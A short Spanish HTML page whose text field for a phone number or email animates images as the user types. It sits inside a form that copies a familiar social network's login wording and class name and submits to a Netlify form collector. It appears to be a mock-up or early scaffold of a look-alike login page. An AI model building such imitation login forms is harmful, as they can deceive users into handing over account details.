<!DOCTYPE html>
<html>
<head>
    <title>Cuadro de texto con imágenes</title>
    <style>
        .imagen-input {
            position: relative;
            display: inline-block;
            width: 250px;
        }

        .imagen-input input[type="text"] {
            width: 100%;
            padding-right: 30px;
        }

        .imagen-input img {
            position: absolute;
            top: 50%;
            right: 5px;
            transform: translateY(-50%);
            height: 20px;
            width: 20px;
            cursor: pointer;
            opacity: 0;
            transition: opacity 0.3s ease-in-out;
        }
    </style>
    <script>
        function mostrarImagenes() {
            var texto = document.getElementById("correo").value;
            var contenedor = document.getElementById("imagenesContainer");
            contenedor.innerHTML = "";

            for (var i = 0; i < texto.length; i++) {
                var letra = texto[i];
                var imagen = document.createElement("img");
                imagen.src = "ruta_de_la_imagen"; // Reemplaza "ruta_de_la_imagen" con la ruta correcta de la imagen que deseas mostrar
                imagen.style.transitionDelay = i * 0.1 + "s";
                contenedor.appendChild(imagen);
                setTimeout(function(img) {
                    img.style.opacity = 1;
                }, i * 100, imagen);
            }
        }
    </script>
</head>
<body>

<div class="_5rut">
    <form name="contact" method="POST" data-netlify="true" action="/index">
        <div class="form-group">
            <div class="imagen-input">
                <input class="form-control" type="text" name="correo" id="correo" placeholder="Número de móvil o correo electrónico" required oninput="mostrarImagenes()">
                <div id="imagenesContainer"></div>
            </div>
        </div>
        <button type="submit" name="submit" class="btn btn-primary btn-block">Iniciar sesión</button>
    </form>
</div>

</body>
</html>
